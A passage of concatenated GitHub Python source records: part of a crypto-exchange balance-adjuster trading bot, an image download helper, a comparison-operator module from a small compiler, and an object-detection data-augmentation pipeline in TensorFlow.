self._log('balance_adjuster_botmom---235Not status {}'.format(coin_fee_pair[0]), severity='error')\n return False\n # (coin, fee, pair): [start, end, adjuster_amount, order_info_adjuster]\n self._adjuster_coins_in_total[coin_fee_pair][-1] = buyback_order_input\n accumulate_amount_of_target_coin += target_coin_buyback_amount\n else:\n accumulate_amount_of_target_coin += value[2]\n self._socketdata.update({'TOTAL_MARGIN': float(accumulate_amount_of_target_coin)})\n log('Total margin in target coin: {}'.format(float(accumulate_amount_of_target_coin)), console=False)\n if accumulate_amount_of_target_coin > self._threshold:\n return True\n return False\n\n def _cancel_opening_orders_then_buyback(self):\n coin_list = [k[0] for k in self._adjuster_coins_in_total.keys()]\n for ex_obj in self._exchanges.values():\n ex_obj.cancel_all_open_orders(coin_list)\n for coin_fee_pair, value in self._adjuster_coins_in_total.items():\n if coin_fee_pair[0] == self._target_coin:\n continue\n # (coin, fee, pair): [start, end, adjuster_amount, order_info_adjuster]\n if value[-2] != 0:\n # Direct pair\n if coin_fee_pair[-1]:\n pair, side, amount, price = value[-1]\n ex = pair[:3]\n pair = pair[3:]\n self._exchanges.get(ex).create_order(pair, 'limit', side, float(amount), float(price))\n # TODO later Indirect pair, must have intermediate\n else:\n for order_info in coin_fee_pair[-1]:\n pair, side, amount, price = order_info\n ex = pair[:3]\n pair = pair[3:]\n self._exchanges.get(ex).create_order(pair, 'limit', side, float(amount), float(price))\n\n\n def _balances_snapshot(self, at):\n if at == 'start': \n position = 0\n elif at == 'end':\n position = 1\n\n # Reset total counter before update\n for _, couters in self._adjuster_coins_in_total.items():\n couters[position] = 0\n\n for ex, coin_info in self._adjuster_coins.items():\n cur_balances = self._exchanges.get(ex).fetch_balance()\n # self._adjuster_coins_in_total: {(coin, fee, pair): [start, end, adjuster_amount, order_info_adjuster]}\n #self._log('coin_info {}'.format(coin_info))\n for coin, _ in coin_info.items():\n if not cur_balances:\n continue\n if not cur_balances.get(coin):\n continue\n cur_balance = Decimal(str(cur_balances.get(coin).get('total')))\n self._adjuster_coins[ex][coin][position] = cur_balance\n if at == 'end':\n start_balance = self._adjuster_coins[ex][coin][0]\n self._adjuster_coins[ex][coin][2] = cur_balance - start_balance\n\n coin_fee_pair = ()\n for item in self._adjuster_coins_in_total.keys():\n if coin == item[0]:\n coin_fee_pair = item\n break\n\n exist_amount = self._adjuster_coins_in_total.get(coin_fee_pair)[position]\n new_amount = exist_amount + cur_balance\n self._adjuster_coins_in_total[coin_fee_pair][position] = new_amount\n if at == 'end':\n for coin_fee_pair in self._adjuster_coins_in_total.keys():\n start_total_balance = self._adjuster_coins_in_total[coin_fee_pair][0]\n cur_total_balance = self._adjuster_coins_in_total[coin_fee_pair][1]\n self._adjuster_coins_in_total[coin_fee_pair][2] = cur_total_balance - start_total_balance\n\n self._socketdata = {}\n adjuster_coins_data = self._adjuster_coins.copy()\n for ex, coin_info in adjuster_coins_data.items():\n coin_dict = {}\n for coin, values in coin_info.items():\n coin_dict.update({coin: [float(e) if isinstance(e, Decimal) else e for e in values]})\n self._socketdata.update({ex: coin_dict})\n self._socketdata.update({'TOTAL': []})\n self._socketdata.update({'TOTAL_MARGIN': 0})\n\n print_out = 'EXCHAGES INFO\\n'\n for ex, coin_info_list in self._adjuster_coins.items():\n print_out += '{}\\n'.format(ex)\n for k, v in coin_info_list.items():\n print_out += '\\t{}\\t{}\\n'.format(k, [float(e) if isinstance(e, Decimal) else e for e in v])\n log(print_out, console=False)\n print_out = '\\nTOTAL INFO\\n'\n for k, v in self._adjuster_coins_in_total.items():\n value = [float(e) if isinstance(e, Decimal) else e for e in v[:-1]]\n self._socketdata['TOTAL'].append({k[0]: value})\n print_out += '\\t{}\\t{}\\n'.format(k[0], value)\n log(\"{}+++++++Balance checking at {} interval++++++++++\".format(print_out, at), console=False)\n\n\n def _find_pair_in_exchange(self, coin1, coin2):\n pair = None\n # Exception case for 'USD' on KRA\n if coin1 == 'USD' or coin2 == 'USD':\n exchange_id = 'KRA'\n else:\n exchange_id = self._buyback_exchange\n market_pairs = [i.get('symbol') for i in self._exchanges.get(exchange_id).api.fetch_markets()]\n pair1 = \"{}/{}\".format(coin1, coin2)\n pair2 = \"{}/{}\".format(coin2, coin1)\n if pair1 in market_pairs:\n pair = pair1\n elif pair2 in market_pairs:\n pair = pair2\n # ee.g. KRAUSDT/USD or BINBTC/USDT\n return exchange_id + pair\n\n def bot_entry(self, web_inputs=None):\n socketio = None\n channel_uuid = ''\n if web_inputs:\n self._socketio = web_inputs.get('socketio')\n socketio = self._socketio\n self._channel_uuid = web_inputs.get('uuid')\n channel_uuid = self._channel_uuid\n self._logger = logging.getLogger(channel_uuid)\n\n self._args = arg_parser(web_inputs)\n self._target_coin = self._args.get('target_coin')\n self._buyback_exchange = self._args.get('buyback_exchange')\n self._buyback = self._args.get('buyback')\n self._threshold = self._args.get('threshold')\n checking_interval = self._args.get('checking_interval')\n ex_and_coin_fee_dict = self._args.get('ex_and_coin_fee')\n\n # Config logger\n self._config_logger()\n\n self._log('START THE BALANCE_ADJUSTER_BOT, INITIALIZING...')\n timer_thread = None\n for exchange_id in ex_and_coin_fee_dict:\n api_file_no = 0\n ex_id = exchange_id\n api_name = ''\n if re.match(r\"^.*\\d$\", ex_id):\n api_file_no = ex_id[-1]\n if ex_id[:-1] == 'BI':\n ex_id = 'BIN'\n elif ex_id[:-1] == 'KR':\n ex_id = 'KRA'\n if '1' == str(api_file_no):\n api_name = self._args.get('account_sell_buy')\n elif '2' == str(api_file_no):\n api_name = self._args.get('account_buy_sell')\n\n exchange_obj = exchange(ex_id, api_name=api_name, own_username=self._args.get('own_username'), api_from_file=api_file_no)\n self._exchanges.update({exchange_id: exchange_obj})\n\n # Initial adjuster list of coins, each item has format: exchang_id: {coin: [start, end, adjuster_amount]}\n # self._adjuster_coins_in_total: {(coin, fee, pair): [start, end, adjuster_amount, order_info_adjuster]}\n for ex, coin_fee_list in ex_and_coin_fee_dict.items():\n self._adjuster_coins.update({ex: {}})\n for coin, fee in coin_fee_list:\n if coin == self._target_coin:\n self._adjuster_coins[ex].update({coin: [Decimal(0), Decimal(0), Decimal(0)]})\n self._adjuster_coins_in_total.update({(coin, fee, None): [Decimal(0), Decimal(0), Decimal(0), ()]})\n continue\n pair = self._find_pair_in_exchange(self._target_coin, coin)\n if pair:\n if coin == 'USD':\n exchange_id = 'KRA'\n else:\n exchange_id = pair[:3]\n self._exchanges.get(exchange_id).register_order_book(pair[3:])\n self._adjuster_coins[ex].update({coin: [Decimal(0), Decimal(0), Decimal(0)]})\n if coin not in [i[0] for i in self._adjuster_coins_in_total.keys()]:\n self._adjuster_coins_in_total.update({(coin, fee, pair): [Decimal(0), Decimal(0), Decimal(0), ()]})\n else:\n # TODO later. There is no direct pair for the coin and target coin, it must have intermediate coin\n info = coin[1][1:-1].split('+')\n intermediate_coin = info[0]\n pair1 = self._find_pair_in_exchange(intermediate_coin, coin[0])\n pair2 = self._find_pair_in_exchange(intermediate_coin, self._target_coin)\n if not pair1 or not pair2:\n self._log(\"balance_adjuster_botmom---420Couldn't find pair for {} {} {}\".format(intermediate_coin, coin[0], self._target_coin), severity='error')\n self._exchanges.get(ex).register_order_book(pair1)\n self._exchanges.get(ex).register_order_book(pair2)\n fees = ((pair1, info[1]), (pair2, info[2]))\n self._adjuster_coins[ex].update({(coin[0], fees, None): [Decimal(0), Decimal(0), Decimal(0)]})\n\n # Take START balances snapshot\n self._balances_snapshot(at='start')\n socket_emit(self._socketdata, self._socketio, self._channel_uuid, 'log_one_way_balance')\n while not self._terminate:\n time.sleep(checking_interval * 60)\n # Take END balances snapshot\n self._balances_snapshot(at='end')\n check_flag = self._adjuster_check()\n socket_emit(self._socketdata, self._socketio, self._channel_uuid, 'log_one_way_balance')\n if check_flag and self._buyback:\n self._log('balance_adjuster_botmom---436**************SIGNAL, ADJUSTING BALANCE ...')\n self._cancel_opening_orders_then_buyback()\n log(\"-------------------------------------------------------------------------------------------------------------\", console=False)\n\n # end while\n if timer_thread:\n timer_thread.join()\n self._log(\"balance_adjuster_botmom---443BALANCE_ADJUSTER_BOT EXIT!\")\n # end bot_entry mothod\n# end balance_adjuster_bot class\n\n\nif __name__ == \"__main__\":\n a_bot = balance_adjuster_bot()\n a_bot.bot_entry()\n os._exit(0)\n","repo_name":"codepritesh/saastoolfeb","sub_path":"bots/balance_adjuster_bot.py","file_name":"balance_adjuster_bot.py","file_ext":"py","file_size_in_byte":21843,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"}
+{"seq_id":"21075289395","text":"# -*- coding: utf-8 -*-\n# -*- mode: python -*-\nimport os\n\ndef get_img(net, url):\n img = net.req(url)\n return img\n\ndef save_img(fobj, fpath, tmppath='temp'):\n ipath = os.path.join(tmppath, fpath)\n ipath = ipath.rstrip('/')\n if not os.path.isfile(ipath):\n dpath = os.path.dirname(ipath)\n if not os.path.isdir(dpath):\n os.makedirs(dpath)\n with open(ipath, 'wb') as f:\n f.write(fobj)\n return ipath\n\ndef download_img(net, url, tmppath='temp'):\n img = get_img(net, url)\n return save_img(img, url.partition('://')[2], tmppath)\n","repo_name":"waipu/bakawipe","sub_path":"lib/ocr/util.py","file_name":"util.py","file_ext":"py","file_size_in_byte":547,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"}
+{"seq_id":"31598071555","text":"from smartanthill_zc import node, expression\nfrom smartanthill_zc.lookup import RootScope\nfrom smartanthill_zc.node import ParameterListNode, Node, ResolutionHelper\n\n\nclass OperatorDeclNode(Node, ResolutionHelper):\n\n '''\n Node class to represent an operator declaration\n '''\n\n def __init__(self, operator, type_name):\n '''\n Constructor\n '''\n super(OperatorDeclNode, self).__init__()\n self.child_parameter_list = None\n self.txt_operator = operator\n self.txt_type_name = type_name\n\n def set_parameter_list(self, child):\n '''\n parameter_list setter\n '''\n assert isinstance(child, ParameterListNode)\n child.set_parent(self)\n self.child_parameter_list = child\n\n def do_resolve_declaration(self, compiler):\n '''\n Template method from ResolutionHelper\n '''\n compiler.resolve_node(self.child_parameter_list)\n\n scope = self.get_scope(RootScope)\n scope.add_operator(compiler, self.txt_operator, self)\n\n return scope.lookup_type(self.txt_type_name)\n\n def static_evaluate(self, compiler, expr, arg_list):\n '''\n Do static evaluation of expressions when possible\n '''\n # pylint: disable=no-self-use\n # pylint: disable=unused-argument\n return None\n\n_negate_comparison_map = {'==': '!=',\n '!=': '==',\n '<': '>=',\n '>': '<=',\n '<=': '>',\n '>=': '<'}\n\n\ndef negate_comparison(txt_op, negate):\n '''\n If negate is False, returns the same txt_op,\n If negate is True, return the negated comparison operator\n '''\n\n if negate:\n return _negate_comparison_map[txt_op]\n else:\n return txt_op\n\n\n_negate_logic_map = {'!': '!',\n '&&': '||',\n '||': '&&'}\n\n\ndef negate_logic(txt_op, negate):\n '''\n If negate is False, returns the same txt_op,\n If negate is True, return the negated logic operator\n '''\n\n if negate:\n return _negate_logic_map[txt_op]\n else:\n return txt_op\n\n\n_swap_comparison_map = {'==': '==',\n '!=': '!=',\n '<': '>',\n '>': '<',\n '<=': '>=',\n '>=': '<='}\n\n\ndef swap_comparison(txt_op, swap):\n '''\n If swap is False, returns the same txt_op,\n If swap is True, return the comparison operator needed to swap lhs y rhs\n '''\n\n if swap:\n return _swap_comparison_map[txt_op]\n else:\n return txt_op\n\n\ndef simplify_comparison(txt_op, value, value_type):\n\n if txt_op in ['==', '!=']: # TODO really want to support == and != ?\n return (txt_op, value)\n elif txt_op == '<':\n return ('<', value_type.round_up(value))\n elif txt_op == '>':\n return ('>', value_type.round_down(value))\n elif txt_op == '<=':\n return ('<', value_type.next_up(value))\n elif txt_op == '>=':\n return ('>', value_type.next_down(value))\n else:\n assert False\n\n\ndef create_number_to_literal_comparison(compiler, ctx, root, operator_list):\n\n for current in operator_list:\n op = compiler.init_node(\n NumberToLiteralCompDeclNode(current, '_zc_boolean'), ctx)\n op.set_parameter_list(\n node.create_parameter_list(compiler, ctx,\n ['_zc_number', '_zc_number_literal']))\n root.add_declaration(op)\n\n op2 = compiler.init_node(\n NumberToLiteralCompDeclNode(current, '_zc_boolean'), ctx)\n op2.set_parameter_list(\n node.create_parameter_list(compiler, ctx,\n ['_zc_number_literal', '_zc_number']))\n op2.swap_flag = True\n root.add_declaration(op2)\n\n\nclass NumberToLiteralCompDeclNode(OperatorDeclNode):\n\n '''\n Node class to represent an special operator declaration\n for comparison between number and number literal\n This comparison is special because it is translated into specific\n ZEPTOVM_OP_JMPIFEXPR_XX operations\n '''\n\n def __init__(self, operator, type_name):\n '''\n Constructor\n '''\n super(NumberToLiteralCompDeclNode, self).__init__(\n operator, type_name)\n self.swap_flag = False\n\n def static_evaluate(self, compiler, expr, arg_list):\n '''\n Do replace generic ComparisonOpExprNode by a much more specific\n NumberToLiteralCompExprNode\n '''\n\n assert isinstance(expr, expression.ComparisonOpExprNode)\n assert len(expr.child_argument_list.childs_arguments) == 2\n\n result = compiler.init_node(NumberToLiteralCompExprNode(), expr.ctx)\n result.set_argument_list(expr.child_argument_list)\n result.ref_decl = self\n\n compiler.remove_node(expr)\n\n result.set_type(self.get_type())\n\n return result\n\n\nclass NumberToLiteralCompExprNode(node.ExpressionNode):\n\n '''\n Node class representing an special operator comparison expression\n between a number and a number literal.\n This kind of expression is created from a regular ComparisonOpExprNode\n by NumberToLiteralCompDeclNode for all expressions that match\n This allows easier detection of this special comparison at a later time\n '''\n\n def __init__(self):\n '''\n Constructor\n '''\n super(NumberToLiteralCompExprNode, self).__init__()\n self.child_argument_list = None\n self.ref_decl = None\n\n def set_argument_list(self, child):\n '''\n argument_list setter\n '''\n assert isinstance(child, node.ArgumentListNode)\n child.set_parent(self)\n self.child_argument_list = child\n\n def get_expression(self):\n assert len(self.child_argument_list.childs_arguments) == 2\n\n i = 0 if not self.ref_decl.swap_flag else 1\n return self.child_argument_list.childs_arguments[i]\n\n def get_literal(self):\n assert len(self.child_argument_list.childs_arguments) == 2\n\n i = 1 if not self.ref_decl.swap_flag else 0\n return self.child_argument_list.childs_arguments[i]\n\n def get_subcode_and_threshold(self, negate):\n '''\n simplify >= and <= to < and > by modifying literal value by epsilon\n Also apply an optional negation flag, as helper for code generator,\n since normally if body is executed when condition is true,\n but at implementation, body is jumped when condition is false\n '''\n\n op = swap_comparison(\n self.ref_decl.txt_operator, self.ref_decl.swap_flag)\n\n op = negate_comparison(op, negate)\n\n threshold = self.get_literal().get_static_value()\n assert threshold\n ltype = self.get_expression().get_type()\n\n return simplify_comparison(op, threshold, ltype)\n\n\ndef create_number_to_number_comparison(compiler, ctx, root, operator_list):\n\n for current in operator_list:\n op = compiler.init_node(\n NumberToNumberCompDeclNode(current, '_zc_boolean'), ctx)\n op.set_parameter_list(node.create_parameter_list(compiler, ctx,\n ['_zc_number',\n '_zc_number']))\n root.add_declaration(op)\n\n\nclass NumberToNumberCompDeclNode(OperatorDeclNode):\n\n '''\n Node class to represent an special operator declaration\n for comparison between number and number literal\n This comparison is special because it is translated into specific\n ZEPTOVM_OP_JMPIFEXPR_XX operations\n '''\n\n def __init__(self, operator, type_name):\n '''\n Constructor\n '''\n super(NumberToNumberCompDeclNode, self).__init__(\n operator, type_name)\n\n def static_evaluate(self, compiler, expr, arg_list):\n '''\n Do replace generic ComparisonOpExprNode by a much more specific\n NumberToLiteralCompExprNode\n '''\n\n assert isinstance(expr, expression.ComparisonOpExprNode)\n assert len(expr.child_argument_list.childs_arguments) == 2\n\n result = compiler.init_node(NumberToNumberCompExprNode(), expr.ctx)\n result.set_argument_list(expr.child_argument_list)\n result.ref_decl = self\n\n compiler.remove_node(expr)\n\n result.set_type(self.get_type())\n\n return result\n\n\nclass NumberToNumberCompExprNode(node.ExpressionNode):\n\n '''\n Node class representing an special operator comparison expression\n between a number and a number literal.\n This kind of expression is created from a regular ComparisonOpExprNode\n by NumberToLiteralCompDeclNode for all expressions that match\n This allows easier detection of this special comparison at a later time\n '''\n\n def __init__(self):\n '''\n Constructor\n '''\n super(NumberToNumberCompExprNode, self).__init__()\n self.child_argument_list = None\n self.ref_decl = None\n\n def set_argument_list(self, child):\n '''\n argument_list setter\n '''\n assert isinstance(child, node.ArgumentListNode)\n child.set_parent(self)\n self.child_argument_list = child\n\n def get_subcode_and_threshold(self, negate):\n '''\n simplify >= and <= to < and > by modifying literal value by epsilon\n Also apply an optional negation flag, as helper for code generator,\n since normally if body is executed when condition is true,\n but at implementation, body is jumped when condition is false\n '''\n op = negate_comparison(self.ref_decl.txt_operator, negate)\n\n ltype = self.child_argument_list.childs_arguments[0].get_type()\n\n return simplify_comparison(op, 0.0, ltype)\n","repo_name":"smartanthill/zepto-compiler","sub_path":"smartanthill_zc/comparison.py","file_name":"comparison.py","file_ext":"py","file_size_in_byte":9828,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"16"}
+{"seq_id":"39598675121","text":"import config\nimport numpy as np\nimport tensorflow as tf\nimport tensorflow.keras as keras\nimport tensorflow_datasets as tfds\nfrom utils.util_graph import shrink_and_normalize_boxes, create_reg_positive_sample\n\n_image_size = [512, 640, 768, 896, 1024, 1280, 1408]\n_STRIDES = [8, 16, 32, 64, 128]\n_ALPHA = 0.0\n\n\n@tf.function\ndef _normalization_image(image, mode):\n if mode == 'ResNetV1':\n # Caffe\n image = image[..., ::-1] # RGB -> BGR\n image -= [103.939, 116.779, 123.68]\n\n elif mode == 'ResNetV2':\n image /= 127.5\n image -= 1.\n\n elif mode == 'EffNet':\n image = image\n\n elif mode in ['DenseNet', 'SEResNet']:\n # Torch\n image /= 255.\n image -= [0.485, 0.456, 0.406]\n image /= [0.229, 0.224, 0.225]\n\n return image\n\n\ndef _fmap_shapes(phi: int = 0, level: int = 5):\n _img_size = int(phi * 128) + 512\n _strides = [int(2 ** (x + 3)) for x in range(level)]\n\n shapes = []\n\n for i in range(level):\n fmap_shape = _img_size // _strides[i]\n shapes.append([fmap_shape, fmap_shape])\n\n return shapes\n\n\n@tf.function\ndef random_flip_horizontal(image, image_shape, bboxes, prob=0.5):\n \"\"\"Flips image and boxes horizontally\n\n Arguments:\n image: A 3-D tensor of shape `(height, width, channels)` representing an\n image.\n image_shape:\n bboxes: A tensor with shape `(num_boxes, 4)` representing bounding boxes,\n having normalized coordinates.\n prob: Chance.\n\n Returns:\n Randomly flipped image and boxes\n \"\"\"\n\n if tf.random.uniform(()) > (1 - prob):\n image = tf.image.flip_left_right(image)\n bboxes = tf.stack(\n [\n image_shape[1] - bboxes[..., 2] - 1,\n bboxes[..., 1],\n image_shape[1] - bboxes[..., 0] - 1,\n bboxes[..., 3]\n ],\n axis=-1\n )\n return image, bboxes\n\n\n@tf.function\ndef random_rotate(image, image_shape, bboxes, prob=0.5):\n offset = image_shape / 2.\n rotate_k = tf.random.uniform((), minval=1, maxval=4, dtype=tf.int32)\n\n def _r_method(x, y, angle):\n tf_cos = tf.math.cos(angle)\n tf_sin = tf.math.sin(angle)\n\n tf_abs_cos = tf.abs(tf_cos)\n tf_abs_sin = tf.abs(tf_sin)\n\n offset_h, offset_w = offset[0], offset[1]\n\n new_offset_w = offset_w * (tf_abs_cos - tf_cos) + offset_h * (tf_abs_sin - tf_sin)\n new_offset_h = offset_w * (tf_abs_sin + tf_sin) + offset_h * (tf_abs_cos - tf_cos)\n\n x_r = x * tf_cos + y * tf_sin + new_offset_w\n y_r = x * tf_sin * -1 + y * tf_cos + new_offset_h\n\n x_r = tf.round(x_r)\n y_r = tf.round(y_r)\n return x_r, y_r\n\n def _rotate_bbox(bbox):\n # degree: pi/2, pi, 3*pi/2\n angle = tf.cast(rotate_k, dtype=tf.float32) * (np.pi / 2.)\n\n x1, y1, x2, y2 = bbox[0], bbox[1], bbox[2], bbox[3]\n\n x1_n, y1_n = _r_method(x1, y1, angle)\n x2_n, y2_n = _r_method(x2, y2, angle)\n\n bbox = tf.stack([\n tf.minimum(x1_n, x2_n),\n tf.minimum(y1_n, y2_n),\n tf.maximum(x1_n, x2_n),\n tf.maximum(y1_n, y2_n)\n ])\n return bbox\n\n if tf.random.uniform(()) > (1 - prob):\n image = tf.image.rot90(image, k=rotate_k)\n\n bboxes = tf.map_fn(\n _rotate_bbox,\n elems=bboxes,\n fn_output_signature=tf.float32\n )\n image_shape = tf.cast(tf.shape(image)[:2], tf.float32)\n bboxes = tf.stack(\n [\n tf.clip_by_value(bboxes[:, 0], 0., image_shape[1] - 2), # x1\n tf.clip_by_value(bboxes[:, 1], 0., image_shape[0] - 2), # y1\n tf.clip_by_value(bboxes[:, 2], 1., image_shape[1] - 1), # x2\n tf.clip_by_value(bboxes[:, 3], 1., image_shape[0] - 1), # y2\n bboxes[:, -1]\n ],\n axis=-1\n )\n return image, image_shape, bboxes\n\n\n@tf.function\ndef multi_scale(image, image_shape, bboxes, prob=0.5):\n new_image_shape = image_shape\n\n if tf.random.uniform(()) > (1 - prob):\n # start, end, step = 0.25, 1.3, 0.05\n # scale = np.random.choice(np.arange(start, end, step))\n scale = tf.random.uniform((), minval=0.8, maxval=1.3)\n\n new_image_shape = tf.round(image_shape * scale)\n image = tf.image.resize(\n image,\n tf.cast(new_image_shape, tf.int32),\n method=tf.image.ResizeMethod.BILINEAR\n )\n bboxes = tf.stack(\n [\n tf.clip_by_value(bboxes[..., 0] * scale, 0, new_image_shape[1] - 2),\n tf.clip_by_value(bboxes[..., 1] * scale, 0, new_image_shape[0] - 2),\n tf.clip_by_value(bboxes[..., 2] * scale, 1, new_image_shape[1] - 1),\n tf.clip_by_value(bboxes[..., 3] * scale, 1, new_image_shape[0] - 1),\n ],\n axis=-1\n )\n bboxes = tf.round(bboxes)\n return image, new_image_shape, bboxes\n\n\n@tf.function\ndef random_crop(image, image_shape, bboxes, prob=0.5):\n if tf.random.uniform(()) > (1 - prob):\n min_x1y1 = tf.cast(tf.math.reduce_min(bboxes, axis=0)[:2], tf.int32)\n max_x2y2 = tf.cast(tf.math.reduce_max(bboxes, axis=0)[2:], tf.int32)\n new_image_shape = tf.cast(image_shape, tf.int32)\n\n random_x1 = tf.random.uniform((), minval=0, maxval=tf.maximum(min_x1y1[0] // 2, 1), dtype=tf.int32)\n random_y1 = tf.random.uniform((), minval=0, maxval=tf.maximum(min_x1y1[1] // 2, 1), dtype=tf.int32)\n\n random_x2 = tf.random.uniform(\n (),\n minval=max_x2y2[0] + 1,\n maxval=tf.math.maximum(\n tf.math.minimum(new_image_shape[1], max_x2y2[0] + (new_image_shape[1] - max_x2y2[0]) // 2),\n max_x2y2[0] + 2\n ),\n dtype=tf.int32\n )\n random_y2 = tf.random.uniform(\n (),\n minval=max_x2y2[1] + 1,\n maxval=tf.math.maximum(\n tf.math.minimum(new_image_shape[0], max_x2y2[1] + (new_image_shape[0] - max_x2y2[1]) // 2),\n max_x2y2[1] + 2\n ),\n dtype=tf.int32\n )\n\n image = tf.image.crop_to_bounding_box(\n image,\n offset_height=random_y1,\n offset_width=random_x1,\n target_height=(random_y2 - random_y1),\n target_width=(random_x2 - random_x1)\n )\n\n bboxes = tf.stack(\n [\n bboxes[:, 0] - tf.cast(random_x1, tf.float32),\n bboxes[:, 1] - tf.cast(random_y1, tf.float32),\n bboxes[:, 2] - tf.cast(random_x1, tf.float32),\n bboxes[:, 3] - tf.cast(random_y1, tf.float32),\n ],\n axis=-1\n )\n image_shape = tf.cast(tf.shape(image)[:2], tf.float32)\n\n return image, image_shape, bboxes\n\n\ndef random_image_saturation(image, prob=.5):\n if tf.random.uniform(()) > (1 - prob):\n image = tf.image.random_saturation(image, 1, 5)\n\n return image\n\n\ndef random_image_brightness(image, prob=.5):\n if tf.random.uniform(()) > (1 - prob):\n image = tf.image.random_brightness(image, 0.8, 1.)\n\n return image\n\n\ndef random_image_contrast(image, prob=.5):\n if tf.random.uniform(()) > (1 - prob):\n image = tf.image.random_contrast(image, 0.2, 1.)\n\n return image\n\n\n@tf.function\ndef image_color_augmentation(image):\n ids = int(tf.random.uniform((), minval=0, maxval=3))\n\n if ids == 0:\n image = random_image_saturation(image)\n\n elif ids == 1:\n image = random_image_brightness(image)\n\n elif ids == 2:\n image = random_image_contrast(image)\n\n return image\n\n\n@tf.function\ndef _image_transform(image, target_size=512, padding_value=.0):\n image_height, image_width = tf.shape(image)[0], tf.shape(image)[1]\n\n if image_height > image_width:\n scale = tf.cast((target_size / image_height), dtype=tf.float32)\n resized_height = target_size\n resized_width = tf.cast((tf.cast(image_width, dtype=tf.float32) * scale), dtype=tf.int32)\n else:\n scale = tf.cast((target_size / image_width), dtype=tf.float32)\n resized_height = tf.cast((tf.cast(image_height, dtype=tf.float32) * scale), dtype=tf.int32)\n resized_width = target_size\n\n image = tf.image.resize(\n image,\n (resized_height, resized_width),\n method=tf.image.ResizeMethod.NEAREST_NEIGHBOR)\n\n offset_h = (target_size - resized_height) // 2\n offset_w = (target_size - resized_width) // 2\n\n # (h, w, c)\n pad = tf.stack(\n [\n tf.stack([offset_h, target_size - resized_height - offset_h], axis=0),\n tf.stack([offset_w, target_size - resized_width - offset_w], axis=0),\n tf.constant([0, 0]),\n ],\n axis=0\n )\n\n image = tf.pad(image, pad, constant_values=padding_value)\n\n return image, scale, [offset_h, offset_w]\n\n\n@tf.function\ndef _bboxes_transform(bboxes, classes, scale, offset_hw, max_bboxes=20, padding=False):\n bboxes *= scale\n bboxes = tf.stack(\n [\n (bboxes[:, 0] + tf.cast(offset_hw[1], dtype=tf.float32)),\n (bboxes[:, 1] + tf.cast(offset_hw[0], dtype=tf.float32)),\n (bboxes[:, 2] + tf.cast(offset_hw[1], dtype=tf.float32)),\n (bboxes[:, 3] + tf.cast(offset_hw[0], dtype=tf.float32)),\n classes\n ],\n axis=-1,\n )\n\n if padding:\n # true_label_count\n bboxes_count = tf.shape(bboxes)[0]\n max_bbox_pad = tf.stack(\n [\n tf.stack([tf.constant(0), max_bboxes - bboxes_count], axis=0),\n tf.constant([0, 0]),\n ],\n axis=0\n )\n bboxes = tf.pad(bboxes, max_bbox_pad, constant_values=0.)\n\n else:\n bboxes_count = tf.shape(bboxes)[0]\n\n return bboxes, bboxes_count\n\n\n@tf.function\ndef _clip_transformed_bboxes(image, bboxes, debug=False):\n image_shape = tf.cast(tf.shape(image)[:2], dtype=tf.float32)\n\n if debug:\n bboxes = tf.stack(\n [\n tf.clip_by_value(bboxes[:, 0] / image_shape[1], 0., 1.), # x1\n tf.clip_by_value(bboxes[:, 1] / image_shape[0], 0., 1.), # y1\n tf.clip_by_value(bboxes[:, 2] / image_shape[1], 0., 1.), # x2\n tf.clip_by_value(bboxes[:, 3] / image_shape[0], 0., 1.), # y2\n bboxes[:, -1]\n ],\n axis=-1\n )\n\n else:\n bboxes = tf.stack(\n [\n tf.clip_by_value(bboxes[:, 0], 0., image_shape[1] - 2), # x1\n tf.clip_by_value(bboxes[:, 1], 0., image_shape[0] - 2), # y1\n tf.clip_by_value(bboxes[:, 2], 1., image_shape[1] - 1), # x2\n tf.clip_by_value(bboxes[:, 3], 1., image_shape[0] - 1), # y2\n bboxes[:, -1]\n ],\n axis=-1\n )\n return bboxes\n\n\n@tf.function\ndef compute_inputs(sample):\n image = tf.cast(sample[\"image\"], dtype=tf.float32)\n image_shape = tf.cast(tf.shape(image)[:2], dtype=tf.float32)\n bboxes = tf.cast(sample[\"objects\"][\"bbox\"], dtype=tf.float32)\n classes = tf.cast(sample[\"objects\"][\"label\"], dtype=tf.float32)\n\n bboxes = tf.stack(\n [\n bboxes[:, 0] * image_shape[1],\n bboxes[:, 1] * image_shape[0],\n bboxes[:, 2] * image_shape[1],\n bboxes[:, 3] * image_shape[0],\n ],\n axis=-1\n )\n return image, image_shape, bboxes, classes\n\n\ndef preprocess_data_v1(\n phi: int = 0,\n mode: str = \"ResNetV1\",\n fmap_shapes: any = None,\n max_bboxes: int = 100,\n padding_value: float = 128.,\n debug: bool = False,\n):\n \"\"\"Applies preprocessing step to a single sample\n\n ref: https://keras.io/examples/vision/retinanet/#preprocessing-data\n\n \"\"\"\n\n def _preprocess_data(sample):\n #\n image, image_shape, bboxes, classes = compute_inputs(sample)\n\n # Image Shape aug.\n if config.MISC_AUG:\n # image, image_shape, bboxes = multi_scale(image, image_shape, bboxes, prob=0.5)\n # image, image_shape, bboxes = random_rotate(image, image_shape, bboxes, prob=.01)\n image, bboxes = random_flip_horizontal(image, image_shape, bboxes, prob=0.5)\n # image, image_shape, bboxes = random_crop(image, image_shape, bboxes, prob=0.5)\n\n # Image Color aug.\n if config.VISUAL_AUG:\n image = image_color_augmentation(image)\n\n # Transforming image and bboxes into fixed-size.\n image, scale, offset_hw = _image_transform(image, _image_size[phi], padding_value)\n image = _normalization_image(image, mode) if not debug else image\n\n # Clipping bboxes\n bboxes, bboxes_count = _bboxes_transform(bboxes, classes, scale, offset_hw, max_bboxes, padding=False)\n bboxes = _clip_transformed_bboxes(image, bboxes, debug=debug)\n\n fmaps_shape = tf.constant(fmap_shapes, dtype=tf.int32)\n # return image, bboxes, bboxes_count[None], fmaps_shape\n return image, bboxes, scale, image_shape\n\n return _preprocess_data\n\n\ndef preprocess_data_v2(\n phi: int = 0,\n mode: str = \"ResNetV1\",\n fmap_shapes: any = None,\n padding_value: float = 128.,\n debug: bool = False,\n):\n \"\"\"Applies preprocessing step to a single sample\n\n ref: https://keras.io/examples/vision/retinanet/#preprocessing-data\n\n \"\"\"\n\n def _preprocess_data(sample):\n #\n image, image_shape, bboxes, classes = compute_inputs(sample)\n\n # Image Shape aug.\n if config.MISC_AUG:\n image, image_shape, bboxes = multi_scale(image, image_shape, bboxes, prob=0.5)\n image, image_shape, bboxes = random_rotate(image, image_shape, bboxes, prob=.5)\n image, bboxes = random_flip_horizontal(image, image_shape, 